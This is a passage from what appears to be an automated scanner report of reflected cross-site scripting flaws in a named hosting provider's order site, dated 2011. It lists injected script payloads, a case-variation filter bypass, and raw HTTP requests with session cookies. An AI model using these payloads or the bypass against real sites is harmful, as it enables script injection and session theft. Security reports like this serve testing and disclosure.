Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:55 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 22:01:02 GMT; Path=/
ETag: 0de3fb6baffce8cb9b37d7e0115e4c0c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17448


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
NO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureGuaranteeMoneyback";UNOUNO.params.lastpage="FeatureGuaranteeMoneyback83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrCitysearch is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrCitysearch. The payload 649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333 was submitted in the REST URL parameter 3. This input was returned as 649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333 in a subsequent request for the URL /xml/order/FeatureMarketingCtrCitysearch.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureMarketingCtrCitysearch649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:25 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=QbGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:59:32 GMT; Path=/
ETag: e7dff180f54a2682d8bf1d6892e7732b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19187


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
s.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureMarketingCtrCitysearch";UNOUNO.params.lastpage="FeatureMarketingCtrCitysearch649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrStat is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrStat. The payload ccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82 was submitted in the REST URL parameter 3. This input was returned as ccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82 in a subsequent request for the URL /xml/order/FeatureMarketingCtrStat.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureMarketingCtrStatccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:51 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=TaV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 21:59:58 GMT; Path=/
ETag: 1df0b07d9edf1e6d8f16386731fd7196
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20481


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureMarketingCtrStat";UNOUNO.params.lastpage="FeatureMarketingCtrStatccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingCgi

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingCgi is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingCgi. The payload 31b1b</ScRiPt%20>c2edeb9151d was submitted in the REST URL parameter 3. This input was returned as 31b1b</ScRiPt >c2edeb9151d in a subsequent request for the URL /xml/order/FeatureSite-buildingCgi.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureSite-buildingCgi31b1b</ScRiPt%20>c2edeb9151d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:30 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:58:38 GMT; Path=/
ETag: 59a5f7cd483dbd625b4e3b3399cb425e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17070


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingCgi";UNOUNO.params.lastpage="FeatureSite-buildingCgi31b1b</ScRiPt >c2edeb9151d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingDsc

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingDsc is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingDsc. The payload 5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac was submitted in the REST URL parameter 3. This input was returned as 5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac in a subsequent request for the URL /xml/order/FeatureSite-buildingDsc.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureSite-buildingDsc5a570</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>5c34db446ac;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:42:53 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=dYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkuNWVuNCcoJCMoJSIlICMkHR4=; Expires=Fri, 07-Apr-2079 21:57:00 GMT; Path=/
ETag: ea2128c5205999f874b214a18414c18c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18755


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingDsc";UNOUNO.params.lastpage="FeatureSite-buildingDsc5a570</ScRiPt ><ScRiPt>alert(1)</ScRiPt>5c34db446ac";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingElements

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureSite-buildingElements is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureSite-buildingElements. The payload 5314a</ScRiPt%20>fdf961380df was submitted in the REST URL parameter 3. This input was returned as 5314a</ScRiPt >fdf961380df in a subsequent request for the URL /xml/order/FeatureSite-buildingElements.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/FeatureSite-buildingElements5314a</ScRiPt%20>fdf961380df;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:47 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 21:57:54 GMT; Path=/
ETag: 905cca0b4e9d618ff10d04815b3bba6b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20910


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
ams.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="FeatureSite-buildingElements";UNOUNO.params.lastpage="FeatureSite-buildingElements5314a</ScRiPt >fdf961380df";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingPhotogallery

Issue detail

